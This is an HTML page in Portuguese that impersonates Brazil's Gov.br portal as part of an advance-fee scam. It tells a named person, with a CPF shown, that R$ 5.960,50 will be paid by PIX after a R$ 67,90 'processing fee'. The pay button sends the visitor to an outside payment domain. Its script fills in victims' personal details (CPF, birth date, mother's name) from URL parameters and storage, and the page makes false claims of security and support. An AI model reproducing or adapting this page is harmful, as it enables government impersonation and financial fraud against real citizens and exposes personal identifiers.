<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Finalização do Processo - Gov.br</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <!-- User Data Manager -->
    <script src="../../js/user-data-manager.js"></script>
    <script src="../../js/utmify-config.js"></script>
    <script src="../../js/utmify-setup.js"></script>
    <link rel="stylesheet" href="css/all.min.css">
    <link rel="icon" href="../../../images/Gov.br_logo.svg.png" type="image/png">
    
    <style>
      .gov-green { background-color: #168821; }
      .gov-text { color: #071D41; }
      .comprovante-container {
        background: linear-gradient(135deg, #f8f9fa 0%, #e9ecef 100%);
        border-radius: 12px;
        box-shadow: 0 10px 30px rgba(0,0,0,0.1);
      }
      .success-animation {
        animation: pulse 2s infinite;
      }
      @keyframes pulse {
        0% { transform: scale(1); }
        50% { transform: scale(1.05); }
        100% { transform: scale(1); }
      }
      .typewriter-active::after {
        content: '|';
        animation: blink 1s infinite;
      }
      @keyframes blink {
        0%, 50% { opacity: 1; }
        51%, 100% { opacity: 0; }
      }
    </style>
</head>
<body class="bg-gray-50">
    <!-- Header Gov.br -->
    <header class="bg-white border-b border-gray-200 px-3 py-4">
        <div class="flex items-center justify-between">
            <div class="flex items-center">
                <img alt="gov.br" loading="lazy" width="120" height="40" decoding="async" data-nimg="1" class="h-8 w-auto" src="images/960px-Canal_Gov_Logo.png" style="color: transparent;">
            </div>
            <div class="flex items-center gap-4">
                <div class="relative">
                    <button class="w-8 h-8 bg-blue-600 rounded-full flex items-center justify-center hover:bg-blue-700 transition-colors focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-offset-2" onclick="toggleDropdown()" aria-label="Perfil do usuário">
                        <svg class="w-5 h-5 text-white" fill="currentColor" viewBox="0 0 20 20">
                            <path fill-rule="evenodd" d="M10 9a3 3 0 100-6 3 3 0 000 6zm-7 9a7 7 0 1114 0H3z" clip-rule="evenodd"></path>
                        </svg>
                    </button>
                    
                    <div id="user-dropdown" class="hidden absolute right-0 mt-2 w-48 bg-white rounded-md shadow-lg py-1 z-50">
                        <a href="#" class="block px-4 py-2 text-sm text-gray-700 hover:bg-gray-100">
                            <i class="fas fa-user mr-2"></i>Meu Perfil
                        </a>
                        <a href="#" class="block px-4 py-2 text-sm text-gray-700 hover:bg-gray-100">
                            <i class="fas fa-cog mr-2"></i>Configurações
                        </a>
                        <hr class="my-1">
                        <a href="#" class="block px-4 py-2 text-sm text-gray-700 hover:bg-gray-100">
                            <i class="fas fa-sign-out-alt mr-2"></i>Sair
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </header>

    <!-- Conteúdo Principal -->
    <main class="px-0 md:px-1 py-4 md:flex md:justify-center md:items-start md:pt-8">
        <div class="bg-white rounded-none md:rounded-lg shadow-none md:shadow-sm border-0 md:border border-gray-200 p-3 mx-0 md:mx-1 md:max-w-4xl w-full">
            <div class="text-center mb-8">
                <h1 class="text-2xl font-bold text-gray-800 mb-2">Finalização do Processo</h1>
                <p class="text-gray-600 mb-4" data-final-instruction="">Silvio, finalize o processo para receber seus valores</p>
                <p class="text-sm text-gray-500">CPF: <span data-user-cpf="">717.148.209-04</span></p>
            </div>
            
            <div class="mb-8">
                <div class="bg-blue-50 border border-blue-200 rounded-lg p-6">
                    <div class="flex items-center gap-3 mb-4">
                        <svg class="w-6 h-6 text-blue-600" fill="currentColor" viewBox="0 0 20 20">
                            <path fill-rule="evenodd" d="M9.383 3.076A1 1 0 0110 4v12a1 1 0 01-1.617.82L4.29 13H2a1 1 0 01-1-1V8a1 1 0 011-1h2.29l4.093-3.82a1 1 0 011.617.82zM12 8a1 1 0 012 0v4a1 1 0 11-2 0V8z" clip-rule="evenodd"></path>
                            <path d="M16.707 5.293a1 1 0 010 1.414A5.972 5.972 0 0118 10a5.972 5.972 0 01-1.293 3.293 1 1 0 11-1.414-1.414A3.972 3.972 0 0016 10c0-.8-.21-1.55-.586-2.207a1 1 0 011.414-1.414z"></path>
                        </svg>
                        <h3 class="text-lg font-semibold text-blue-800">Instruções Finais</h3>
                    </div>
                    <p class="text-blue-700 text-sm mb-4">Ouça as instruções para finalizar o processo:</p>
                    <div class="border border-gray-300 rounded-lg p-2 bg-white">
                        <audio controls="" autoplay="" class="w-full" preload="auto">
                            <source src="media/dasdadadasdasdas.mp3" type="audio/mpeg">
                            Seu navegador não suporta o elemento de áudio.
                        </audio>
                    </div>
                </div>
            </div>
            
            <div class="mb-8 space-y-4">
                <div class="flex justify-between items-center p-4 bg-white rounded-lg border border-green-200 shadow-sm">
                    <div class="flex items-center gap-3">
                        <div class="w-10 h-10 bg-green-100 rounded-full flex items-center justify-center">
                            <svg class="w-5 h-5 text-green-600" fill="currentColor" viewBox="0 0 20 20">
                                <path fill-rule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm3.707-9.293a1 1 0 00-1.414-1.414L9 10.586 7.707 9.293a1 1 0 00-1.414 1.414l2 2a1 1 0 001.414 0l4-4z" clip-rule="evenodd"></path>
                            </svg>
                        </div>
                        <div>
                            <p class="font-semibold text-gray-800">Valor a Receber via PIX</p>
                            <p class="text-sm text-gray-600">Transferência instantânea</p>
                        </div>
                    </div>
                    <div class="text-right">
                        <p class="text-lg font-bold text-green-600">R$ 5.960,50</p>
                    </div>
                </div>
                
                <div class="flex justify-between items-center p-4 bg-white rounded-lg border border-orange-200 shadow-sm">
                    <div class="flex items-center gap-3">
                        <div class="w-10 h-10 bg-orange-100 rounded-full flex items-center justify-center">
                            <svg class="w-5 h-5 text-orange-600" fill="currentColor" viewBox="0 0 20 20">
                                <path d="M4 4a2 2 0 00-2 2v4a2 2 0 002 2V6h10a2 2 0 00-2-2H4zm2 6a2 2 0 012-2h8a2 2 0 012 2v4a2 2 0 01-2 2H8a2 2 0 01-2-2v-4zm6 4a2 2 0 100-4 2 2 0 000 4z"></path>
                            </svg>
                        </div>
                        <div>
                            <p class="font-semibold text-gray-800">Taxa de Processamento</p>
                            <p class="text-sm text-gray-600">Pagamento único</p>
                        </div>
                    </div>
                    <div class="text-right">
                        <p class="text-lg font-bold text-orange-600">R$ 67,90</p>
                    </div>
                </div>
            </div>
            
            <div class="text-center mb-8">
                <button onclick="pagarTaxa()" class="w-full bg-green-600 hover:bg-green-700 text-white py-4 px-6 rounded-full font-bold text-base transition-all duration-300 transform hover:scale-105 flex items-center justify-center gap-3 shadow-lg">
                    <svg class="w-6 h-6" fill="currentColor" viewBox="0 0 20 20">
                        <path d="M4 4a2 2 0 00-2 2v4a2 2 0 002 2V6h10a2 2 0 00-2-2H4zm2 6a2 2 0 012-2h8a2 2 0 012 2v4a2 2 0 01-2 2H8a2 2 0 01-2-2v-4zm6 4a2 2 0 100-4 2 2 0 000 4z"></path>
                    </svg>
                    PAGAR TAXA R$67,90
                    <svg class="w-5 h-5" fill="currentColor" viewBox="0 0 20 20">
                        <path fill-rule="evenodd" d="M10.293 3.293a1 1 0 011.414 0l6 6a1 1 0 010 1.414l-6 6a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-4.293-4.293a1 1 0 010-1.414z" clip-rule="evenodd"></path>
                    </svg>
                </button>
            </div>
            
            <div class="mb-6 p-4 bg-green-50 border border-green-200 rounded-lg">
                <div class="flex items-center gap-2 mb-2">
                    <svg class="w-5 h-5 text-green-600" fill="currentColor" viewBox="0 0 20 20">
                        <path fill-rule="evenodd" d="M2.166 4.999A11.954 11.954 0 0010 1.944 11.954 11.954 0 0017.834 5c.11.65.166 1.32.166 2.001 0 5.225-3.34 9.67-8 11.317C5.34 16.67 2 12.225 2 7c0-.682.057-1.35.166-2.001zm11.541 3.708a1 1 0 00-1.414-1.414L9 10.586 7.707 9.293a1 1 0 00-1.414 1.414l2 2a1 1 0 001.414 0l4-4z" clip-rule="evenodd"></path>
                    </svg>
                    <h3 class="font-semibold text-green-800">Pagamento Seguro</h3>
                </div>
                <p class="text-green-700 text-sm">✅ Ambiente protegido por SSL<br>✅ Dados criptografados<br>✅ Processamento instantâneo<br>✅ Suporte 24h disponível</p>
            </div>
            
            <div class="p-4 bg-yellow-50 border border-yellow-200 rounded-lg">
                <div class="flex items-center gap-2 mb-2">
                    <svg class="w-5 h-5 text-yellow-600" fill="currentColor" viewBox="0 0 20 20">
                        <path fill-rule="evenodd" d="M8.257 3.099c.765-1.36 2.722-1.36 3.486 0l5.58 9.92c.75 1.334-.213 2.98-1.742 2.98H4.42c-1.53 0-2.493-1.646-1.743-2.98l5.58-9.92zM11 13a1 1 0 11-2 0 1 1 0 012 0zm-1-8a1 1 0 00-1 1v3a1 1 0 002 0V6a1 1 0 00-1-1z" clip-rule="evenodd"></path>
                    </svg>
                    <h3 class="font-semibold text-yellow-800">Importante</h3>
                </div>
                <p class="text-yellow-700 text-sm">Após o pagamento da taxa, o valor de <strong>R$ 5.960,50</strong> será transferido automaticamente para sua chave PIX em até 10 minutos. Mantenha seus dados atualizados e aguarde a confirmação.</p>
            </div>
        </div>
    </main>

    <script>
      // Função para controlar o dropdown do usuário
      function toggleDropdown() {
        const dropdown = document.getElementById('user-dropdown');
        dropdown.classList.toggle('hidden');
      }

      // Função para pagar taxa
      function pagarTaxa() {
        window.location.href = 'https://pay.centraldados.shop/z0qn35do58vg98m';
      }

      // Função para abrir comprovante em tela cheia
      function openComprovante() {
        console.log('🚀 Abrindo comprovante...');
        
        // Obter dados reais da URL atual
        const urlParams = new URLSearchParams(window.location.search);
        let userName = 'João Silva'; // fallback
        
        if (urlParams.has('nome')) {
          userName = urlParams.get('nome');
          console.log('✅ Nome obtido da URL:', userName);
        } else if (typeof window.getUserFullName === 'function') {
          const userDataName = window.getUserFullName();
          if (userDataName && userDataName !== 'Silvio Santos Silva') {
            userName = userDataName;
            console.log('✅ Nome obtido via getUserFullName:', userName);
          }
        }
        
        const nomeEncoded = encodeURIComponent(userName);
        window.open(`comprovante.html?nome=${nomeEncoded}`, '_blank');
      }

      // Função para finalizar processo
      function finalizeProcess() {
        // Mostrar confirmação antes de redirecionar
        if (confirm('Tem certeza que deseja finalizar o saque? Esta ação não pode ser desfeita.')) {
          console.log('🚀 Finalizando processo...');
          
          // Obter dados reais da URL atual
          const urlParams = new URLSearchParams(window.location.search);
          let userName = 'João Silva'; // fallback
          
          if (urlParams.has('nome')) {
            userName = urlParams.get('nome');
            console.log('✅ Nome obtido da URL:', userName);
          } else if (typeof window.getUserFullName === 'function') {
            const userDataName = window.getUserFullName();
            if (userDataName && userDataName !== 'Silvio Santos Silva') {
              userName = userDataName;
              console.log('✅ Nome obtido via getUserFullName:', userName);
            }
          }
          
          const nomeEncoded = encodeURIComponent(userName);
          window.location.href = `comprovante.html?nome=${nomeEncoded}`;
        }
      }

      // Função para animar a digitação dos valores
      function startTypingAnimation() {
        const linhas = [
          { 
            id: 'linha1', 
            multa: '25,40', 
            juros: '8,25', 
            total: '33,65',
            multaClass: 'typewriter-multa1',
            jurosClass: 'typewriter-juros1', 
            totalClass: 'typewriter-total1'
          },
          { 
            id: 'linha2', 
            multa: '15,35', 
            juros: '5,90', 
            total: '21,25',
            multaClass: 'typewriter-multa2',
            jurosClass: 'typewriter-juros2', 
            totalClass: 'typewriter-total2'
          },
          { 
            id: 'linha3', 
            multa: '8,10', 
            juros: '1,40', 
            total: '9,50',
            multaClass: 'typewriter-multa3',
            jurosClass: 'typewriter-juros3', 
            totalClass: 'typewriter-total3'
          },
          { 
            id: 'linha4', 
            multa: '2,95', 
            juros: '0,55', 
            total: '3,50',
            multaClass: 'typewriter-multa4',
            jurosClass: 'typewriter-juros4', 
            totalClass: 'typewriter-total4'
          },
          { 
            id: 'linha5', 
            total: 'R$ 67,90',
            totalClass: 'typewriter-total-geral'
          }
        ];

        let currentIndex = 0;

        function typeNextLine() {
          if (currentIndex < linhas.length) {
            const current = linhas[currentIndex];
            const element = document.getElementById(current.id);
            
            // Mostrar o elemento
            element.style.opacity = '1';
            
            // Animar a digitação para linha de total geral
            if (currentIndex === 4) {
              const totalSpan = element.querySelector('.' + current.totalClass);
              typeText(totalSpan, current.total, () => {
                currentIndex++;
                setTimeout(typeNextLine, 500);
              });
            } else {
              // Animar multa, juros e total sequencialmente
              const multaSpan = element.querySelector('.' + current.multaClass);
              const jurosSpan = element.querySelector('.' + current.jurosClass);
              const totalSpan = element.querySelector('.' + current.totalClass);
              
              typeText(multaSpan, current.multa, () => {
                setTimeout(() => {
                  typeText(jurosSpan, current.juros, () => {
                    setTimeout(() => {
                      typeText(totalSpan, current.total, () => {
                        currentIndex++;
                        setTimeout(typeNextLine, 800);
                      });
                    }, 300);
                  });
                }, 300);
              });
            }
          }
        }

        function typeText(element, text, callback) {
          let charIndex = 0;
          element.classList.add('typewriter-active');
          const typeInterval = setInterval(() => {
            element.textContent = text.substring(0, charIndex + 1);
            charIndex++;
            
            if (charIndex >= text.length) {
              clearInterval(typeInterval);
              element.classList.remove('typewriter-active');
              if (callback) callback();
            }
          }, 80);
        }

        typeNextLine();
      }

      // Configurações quando a página carregar
      document.addEventListener('DOMContentLoaded', function() {
        // Iniciar efeito de digitação nos valores
        setTimeout(function() {
          startTypingAnimation();
        }, 2000); // Inicia após 2 segundos

        // Iniciar contador regressivo para o botão
        let countdown = 18;
        const button = document.getElementById('finalizeButton');
        const countdownElement = document.getElementById('countdown');
        
        const timer = setInterval(function() {
          countdown--;
          countdownElement.textContent = countdown;
          
          if (countdown <= 0) {
            clearInterval(timer);
            
            // Habilitar o botão após 18 segundos
            button.disabled = false;
            button.onclick = finalizeProcess;
            button.className = 'w-full py-4 px-6 rounded-full font-bold text-lg transition-all duration-300 flex items-center justify-center gap-2 bg-green-600 hover:bg-green-700 text-white transform hover:scale-105 cursor-pointer';
            button.innerHTML = `
              <svg class="w-6 h-6" fill="currentColor" viewBox="0 0 20 20">
                <path fill-rule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm3.707-9.293a1 1 0 00-1.414-1.414L9 10.586 7.707 9.293a1 1 0 00-1.414 1.414l2 2a1 1 0 001.414 0l4-4z" clip-rule="evenodd"></path>
              </svg>
              FINALIZAR SAQUE
            `;
          }
        }, 1000);

        // Fechar dropdown ao clicar fora
        document.addEventListener('click', function(event) {
          const dropdown = document.getElementById('user-dropdown');
          const userButton = document.querySelector('[aria-label="Perfil do usuário"]');
          
          if (dropdown && userButton && 
              !dropdown.contains(event.target) && 
              !userButton.contains(event.target)) {
            dropdown.classList.add('hidden');
          }
        });

      // Adicionar efeito de sucesso
      setTimeout(function() {
        console.log('🎉 Processo de saque confirmado!');
      }, 1000);
      
      // SISTEMA DE CARREGAMENTO DE DADOS REAIS
      function loadUserDataFromURL() {
        console.log('🔍 Carregando dados do usuário...');
        
        // PRIORIDADE 1: Verificar dados na URL
        const urlParams = new URLSearchParams(window.location.search);
        let userData = null;
        
        if (urlParams.has('nome') || urlParams.has('cpf')) {
          userData = {
            nome: urlParams.get('nome'),
            cpf: urlParams.get('cpf'),
            nascimento: urlParams.get('nascimento'),
            nomeMae: urlParams.get('nomeMae'),
            estadoCivil: urlParams.get('estadoCivil'),
            nomeCompleto: urlParams.get('nomeCompleto') || urlParams.get('nome')
          };
          console.log('✅ Dados encontrados na URL:', userData);
        }
        
        // PRIORIDADE 2: Tentar user-data-manager
        if (!userData && typeof window.getUserData === 'function') {
          try {
            userData = window.getUserData();
            console.log('✅ Dados obtidos via getUserData:', userData);
          } catch (error) {
            console.log('❌ Erro getUserData:', error);
          }
        }
        
        // PRIORIDADE 3: SessionStorage
        if (!userData) {
          const sessionData = sessionStorage.getItem('userData');
          if (sessionData) {
            try {
              userData = JSON.parse(sessionData);
              console.log('✅ Dados obtidos via sessionStorage:', userData);
            } catch (error) {
              console.log('❌ Erro ao parsear sessionStorage:', error);
            }
          }
        }
        
        // Atualizar interface com dados reais
        if (userData) {
          updatePageWithUserData(userData);
        } else {
          console.log('⚠️ Nenhum dado de usuário encontrado - usando dados padrão');
        }
      }
      
      function updatePageWithUserData(userData) {
        console.log('🔧 Atualizando página com dados:', userData);
        
        // Atualizar instrução final
        const finalInstruction = document.querySelector('[data-final-instruction]');
        if (finalInstruction && userData.nome) {
          finalInstruction.textContent = `${userData.nome}, finalize o processo para receber seus valores`;
        }
        
        // Atualizar CPF exibido
        const cpfElement = document.querySelector('[data-user-cpf]');
        if (cpfElement && userData.cpf) {
          cpfElement.textContent = userData.cpf;
        }
        
        console.log('✅ Interface atualizada com dados reais');
      }
      
      // Carregar dados quando a página carrega
      loadUserDataFromURL();
      });
    </script>


</body></html>